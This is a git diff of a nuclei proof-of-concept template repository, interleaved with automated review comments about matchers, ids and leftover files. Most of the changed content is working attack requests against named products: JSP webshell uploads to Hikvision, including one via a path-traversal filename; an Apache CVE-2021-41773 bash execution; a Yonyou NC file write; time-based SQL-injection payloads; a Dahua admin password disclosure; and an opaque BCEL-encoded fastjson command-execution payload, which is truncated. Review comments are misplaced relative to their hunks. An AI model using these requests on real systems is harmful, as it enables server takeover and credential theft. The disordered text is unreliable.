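Review bot: The new payload is an opaque `$$BCEL$$`-encoded class passed as `driverClassName`, with no comment or reference saying what the embedded class does, so a reviewer cannot verify the template's effect on a target beyond the `Testcmd: whoami` hint; an unreviewable blob in a scanning template is a supply-chain risk for everyone who runs this repository and should at least cite the source it was generated from. The file keeps its `_upload.yaml` name while the content is now a command-execution check, `name: HIKVISION` carries no information, and `id: HIKVISION` is shared verbatim with `Hikvision_iVMS-8700_upload_action.yaml` below; the same name/content mismatch applies to `Nsfocus_sas_getFile_read.yaml` and `Dahua_Video_FileUpload.yaml` on this page. The matcher `"nt authority\\system"` asserts a specific Windows identity, so hits are limited to that deployment shape — worth stating in `description`.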
@@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - 
".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index 1cd783867f..a8f9cbe173 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml 
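Review bot: The uploaded `{{str1}}.jsp` stays on the target after verification and nothing in `info` says so; note the artifact in `description` so operators can remove it. `body_2 == str2` requires the entire second response body to equal the random string byte for byte, so any trailing newline or whitespace emitted by the container makes the comparison fail and the template silently reports not vulnerable — if that strictness is intended, a comment saying so will keep the next maintainer from relaxing it. The `name` value "Comprehensive Security Management Platform 1" looks like a stray character, and the `extractors:` block is placed after both raw requests without a comment naming the request whose JSON it reads.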
@@ -1,28 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + 
--4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "nologin" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/remote_code_execution/rce-cve-2021-41773.yaml b/poc/remote_code_execution/rce-cve-2021-41773.yaml index f8fd2f8e57..bf20e22be5 100644 --- a/poc/remote_code_execution/rce-cve-2021-41773.yaml +++ b/poc/remote_code_execution/rce-cve-2021-41773.yaml @@ -4,11 +4,13 @@ info: author: RafaelCaria severity: critical tags: cve,cve2021,rce + requests: - method: POST path: - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' body: 'echo;id' + matchers: - type: regex part: body diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml 
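Review bot: The third DSL condition, `contains(body_3, '{{randstr}}')`, references a value that no request in this template ever sends — `{{randstr}}` appears in none of the three raw bodies — so with `condition: and` the matcher can never be satisfied and the template is inert as committed; if that is deliberate it should be stated in `description`, otherwise the matcher is wrong. `name:` says "NF Next Generation Firewall" while `description:` says "SSL VPN", and the file keeps its `Nsfocus_sas_getFile_read.yaml` name from the content it replaced. The fixed `Content-Length: 238` and `Content-Length: 217` headers will disagree with the multipart bodies as soon as either is edited; leaving the length to nuclei, as the other raw templates on this page do, avoids that.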
@@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/sql/BlindSQL.yaml b/poc/sql/BlindSQL.yaml index 6fd8c3c79a..815cf7212b 100644 --- a/poc/sql/BlindSQL.yaml 
+++ b/poc/sql/BlindSQL.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: 3rag severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/sql_injection/BlindSQL.yaml b/poc/sql_injection/BlindSQL.yaml index 6fd8c3c79a..815cf7212b 100644 --- a/poc/sql_injection/BlindSQL.yaml +++ b/poc/sql_injection/BlindSQL.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: 3rag severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/sql_injection/yongyou-icurrtype-sqli.yaml b/poc/sql_injection/yongyou-icurrtype-sqli.yaml index 3debcda25e..219b23ef78 100644 --- a/poc/sql_injection/yongyou-icurrtype-sqli.yaml +++ b/poc/sql_injection/yongyou-icurrtype-sqli.yaml 
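Review bot: `severity: Critical` is capitalised while every other template on this page uses the lowercase values (`critical`, `high`, `medium`, `low`) that nuclei documents; even if the loader normalises case, the file is inconsistent with the repository. The same two hunks are applied to an identical copy at `poc/sql_injection/BlindSQL.yaml` with the same `id: time-based-sqli`, so loading the whole tree yields duplicate template ids — one copy should go or the ids should differ. The `author:` change from `Coffinxp/lostsec` to `3rag` reattributes content the commit otherwise only trims, with no explanation in the commit.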
@@ -1,11 +1,9 @@ id: yongyou-jdbcRead - info: name: yongyou配置文件读取 author: Str1am severity: high tags: yongyou - requests: - raw: - | @@ -28,8 +26,6 @@ requests: - - matchers-condition: and matchers: - type: status @@ -39,4 +35,4 @@ requests: words: - "jdbc:" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 1af31ba824..77936cf562 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
@@ -1,43 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" http: - - raw: - - | - POST /publishing/publishing/material/file/video HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 804 - Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 - Accept-Encoding: gzip, deflate - Connection: close + - method: GET + path: + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" - - Test - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Submit" - - submit - --dd8f988919484abab3816881c55272a7-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "success")' - - 'contains(body_1, "path")' - condition: and + - type: word + part: body + words: + - "loginName" + - "loginPass" + + - type: status + status: + - 200 -# /publishingImg/VIDEO/230812152005170200.jsp +# 获取后访问地址 +# /admin/login_login.action 
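Review bot: The matcher only checks that the words `loginName` and `loginPass` appear somewhere in a 200 body, so a response that returns those keys with empty or null values, or an error page that echoes the field names, is reported as a credential leak; if the body is JSON as the key names suggest, match the value instead, e.g. a regex matcher `"loginPass"\s*:\s*"[^"]+"` with `part: body`. The new request discloses the password of the `system` account and the trailing comment points at `/admin/login_login.action` to use it, which is effectively an admin takeover, so `severity: medium` looks low for what is claimed — worth reconsidering. The file also keeps its `Dahua_Video_FileUpload.yaml` path and the bare `id: Dahua` although it no longer tests an upload; a descriptive id such as `dahua-smartpark-getuserinfo-disclosure` and a matching file name would stop it colliding with other Dahua templates.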
diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml
index cd961f6e81..e86e8491d1 100644
--- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")'
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "test")'
+ condition: and
diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml
index 7e328a8b1b..0ebd67934b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml
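Review bot: The first request writes a fixed `test.jsp` into the eportal webapp via the traversal `filename=` and the second request's only content check is `contains(body_2, "test")`, so a file left behind by an earlier run (the template never removes it) or any page that happens to contain the word `test` satisfies the matcher, and every scan overwrites the same artifact on the target. Use per-run random values the way the sibling `Hikvision_iVMS-8700_upload_action.yaml` in this commit does with `rand_base(6)`: a random file name in both the upload `filename=` and the `GET /portal/ui/login/..;/..;/` path, and a random marker printed by the JSP and compared in the dsl, so a hit is attributable to this scan. The JSP still remains on the server after the check, so `description` should tell operators to delete it from `webapps/eportal` once the finding is confirmed.
```yaml
variables:
  str1: '{{rand_base(6)}}'
  str2: '{{rand_base(6)}}'
# … unchanged: info, metadata, first request line and headers …
      Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/{{str1}}.jsp"
      Content-Type: application/zip

      <%out.print("{{str2}}");%>
# … unchanged: closing boundary …
      GET /portal/ui/login/..;/..;/{{str1}}.jsp HTTP/1.1
# … unchanged: Host, User-Agent, req-condition, first three dsl checks …
      - 'contains(body_2, str2)'
```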
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
